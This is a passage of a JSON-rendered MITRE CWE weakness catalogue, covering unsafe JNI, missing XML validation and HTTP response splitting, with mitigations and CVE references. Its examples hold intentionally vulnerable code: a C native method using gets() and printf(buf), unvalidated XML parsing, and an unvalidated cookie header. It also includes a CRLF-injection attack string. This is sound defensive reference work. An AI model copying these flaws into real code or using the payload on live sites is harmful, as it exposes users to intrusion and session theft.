name=\\"DateRangeForm\\"&gt;&lt;/form&gt;","xhtml:div":{"#text":"&lt;field property=\\"startDate\\" depends=\\"date\\"&gt;&lt;/field&gt;&lt;field property=\\"endDate\\" depends=\\"date\\"&gt;&lt;/field&gt;&lt;field property=\\"scale\\" depends=\\"integer\\"&gt;&lt;/field&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;arg0 key=\\"start.date\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg0 key=\\"end.date\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg0 key=\\"range.scale\\"/&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Validator Without Form Field"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"111":{"attr":{"@_ID":"111","@_Name":"Direct Use of Unsafe JNI","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.","Extended_Description":"Many safety features that programmers may take for granted do not apply for native code, so you must carefully review all such code for potential problems. The languages used to implement native code may be more susceptible to buffer overflows and other attacks. Native code is unprotected by the security features enforced by the runtime environment, such as strong typing and array bounds checking.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Implement error handling around the JNI call."},{"Phase":"Implementation","Strategy":"Refactoring","Description":"Do not use JNI calls if you don\'t trust the native library."},{"Phase":"Implementation","Strategy":"Refactoring","Description":"Be reluctant to use JNI calls. A Java API equivalent may exist."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code defines a class named Echo. The class declares one native method (defined below), which uses C to echo commands entered on the console back to the user. The following C code defines the native method implemented in the Echo class:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class Echo {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public native void runEcho();static {}public static void main(String[] args) {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.loadLibrary(\\"echo\\");","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new Echo().runEcho();","xhtml:br":""}}]}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;jni.h&gt;#include \\"Echo.h\\"//the java class above compiled with javah#include &lt;stdio.h&gt;JNIEXPORT void JNICALLJava_Echo_runEcho(JNIEnv *env, jobject obj){}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"char buf[64];gets(buf);printf(buf);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":["Because the example is implemented in Java, it may appear that it is immune to memory issues like buffer overflow vulnerabilities. Although Java does do a good job of making memory operations safe, this protection does not extend to vulnerabilities occurring in source code written in other languages that are accessed using the Java Native Interface. Despite the memory protections offered in Java, the C code in this example is vulnerable to a buffer overflow because it makes use of gets(), which does not check the length of its input.","The Sun Java(TM) Tutorial provides the following description of JNI [See Reference]: The JNI framework lets your native method utilize Java objects in the same way that Java code uses these objects. A native method can create Java objects, including arrays and strings, and then inspect and use these objects to perform its tasks. A native method can also inspect and use objects created by Java application code. A native method can even update Java objects that it created or that were passed to it, and these updated objects are available to the Java application. Thus, both the native language side and the Java side of an application can create, update, and access Java objects and then share these objects between them.","The vulnerability in the example above could easily be detected through a source code audit of the native method implementation. This may not be practical or possible depending on the availability of the C source code and the way the project is built, but in many cases it may suffice. However, the ability to share objects between Java and native methods expands the potential risk to much more insidious cases where improper data handling in Java may lead to unexpected vulnerabilities in native code or unsafe operations in native code corrupt data structures in Java. Vulnerabilities in native code accessed through a Java application are typically exploited in the same manner as they are in applications written in the native language. The only challenge to such an attack is for the attacker to identify that the Java application uses native code to perform certain operations. This can be accomplished in a variety of ways, including identifying specific behaviors that are often implemented with native code or by exploiting a system information exposure in the Java application that reveals its use of JNI [See Reference]."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unsafe JNI"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC08-J","Entry_Name":"Define wrappers around native methods"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"JNI01-J","Entry_Name":"Safely invoke standard APIs that perform tasks using the immediate caller\'s class loader instance (loadLibrary)"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"JNI00-J","Entry_Name":"Define wrappers around native methods","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-41"}},{"attr":{"@_External_Reference_ID":"REF-42"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Unsafe JNI","attr":{"@_Date":"2008-04-11"}}}},"112":{"attr":{"@_ID":"112","@_Name":"Missing XML Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software accepts XML from an untrusted source but does not validate the XML against the proper schema.","Extended_Description":"Most successful attacks begin with a violation of the programmer\'s assumptions. By accepting an XML document without validating it against a DTD or XML schema, the programmer leaves a door open for attackers to provide unexpected, unreasonable, or malicious input.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1286","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":{"xhtml:p":["Always validate XML input against a known XML Schema or DTD.","It is not possible for an XML parser to validate all aspects of a document\'s content because a parser cannot understand the complete semantics of the data. However, a parser can do a complete and thorough job of checking the document\'s structure and therefore guarantee to the code that processes the document that the content is well-formed."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code loads and parses an XML file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch(Exception ex) {}","xhtml:br":["",""],"xhtml:i":"// Read DOM","xhtml:div":[{"#text":"...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The XML file is loaded without validating it against a known XML Schema or DTD."},{"Intro_Text":"The following code creates a DocumentBuilder object to be used in building an XML document.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();builderFactory.setNamespaceAware(true);DocumentBuilder builder = builderFactory.newDocumentBuilder();","xhtml:br":["",""]}},"Body_Text":"The DocumentBuilder object does not validate an XML document against a schema, making it possible to create an invalid XML document."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing XML Validation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"113":{"attr":{"@_ID":"113","@_Name":"Improper Neutralization of CRLF Sequences in HTTP Headers (\'HTTP Response Splitting\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.","Extended_Description":{"xhtml:p":["Including unvalidated data in an HTTP header allows an attacker to specify the entirety of the HTTP response rendered by the browser. When an HTTP request contains unexpected CR (carriage return, also given by %0d or \\\\r) and LF (line feed, also given by %0a or \\\\n) characters the server may respond with an output stream that is interpreted as two different HTTP responses (instead of one). An attacker can control the second response and mount attacks such as cross-site scripting and cache poisoning attacks.","HTTP response splitting weaknesses may be present when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Data enters a web application through an untrusted source, most frequently an HTTP request.","The data is included in an HTTP response header sent to a web user without being validated for malicious characters."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"93","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"79","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Modify Application Data","Gain Privileges or Assume Identity"],"Note":"CR and LF characters in an HTTP header may give attackers control of the remaining headers and body of the response the application intends to send, as well as allowing them to create additional responses entirely under their control."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Construct HTTP headers very carefully, avoiding the use of non-validated input data."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String author = request.getParameter(AUTHOR_PARAM);...Cookie cookie = new Cookie(\\"author\\", author);cookie.setMaxAge(cookieExpiration);response.addCookie(cookie);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"HTTP/1.1 200 OK...Set-Cookie: author=Jane Smith...","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"Wiley Hacker\\\\r\\\\nHTTP/1.1 200 OK\\\\r\\\\n"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"HTTP/1.1 200 OK...Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK...","xhtml:br":["","",""]}}],"Body_Text":["Assuming a string consisting of standard alpha-numeric characters, such as \\"Jane Smith\\", is submitted in the request the HTTP response including this cookie might take the following form:","However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as","then the HTTP response would be split into two responses of the following form:","Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"cross-user defacement"},{"xhtml:div":"web and browser cache poisoning"},{"xhtml:div":"cross-site scripting"},{"xhtml:div":"page hijacking"}]}}]},{"Intro_Text":"An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cross-User Defacement","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":[{"xhtml:div":"In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application."},{"xhtml:div":"In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker."}]}}]}}},{"Intro_Text":"The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cache Poisoning","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected."]}}},{"Intro_Text":"Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cross-Site Scripting","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user\'s browser.","The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\'s machine under the guise of the vulnerable site.","The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim\'s account."]}}},{"Intro_Text":"In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Page Hijacking","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.","Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker\'s request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker\'s request is already waiting and is interpreted as a response to the victim\'s request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim."]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2146","Description":"Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2146"},{"Reference":"CVE-2004-1620","Description":"HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1620"},{"Reference":"CVE-2004-1656","Description":"HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1656"},{"Reference":"CVE-2005-2060","Description":"Bulletin board allows response splitting via CRLF in parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2060"},{"Reference":"CVE-2005-2065","Description":"Bulletin board allows response splitting via CRLF in parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2065"},{"Reference":"CVE-2004-2512","Description":"Response splitting via CRLF in PHPSESSID.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2512"},{"Reference":"CVE-2005-1951","Description":"Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951"},{"Reference":"CVE-2004-1687","Description":"Chain: HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"HTTP response splitting"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"HTTP Response Splitting"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":25,"Entry_Name":"HTTP Response Splitting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-43"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting).&#34; Page 31"}}]},"Notes":{"Note":{"#text":"HTTP response splitting is probably only multi-factor in an environment that uses intermediaries.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"HTTP Response Splitting","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize CRLF Sequences in HTTP Headers (aka \'HTTP Response Splitting\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize CRLF Sequences in HTTP Headers (\'HTTP Response 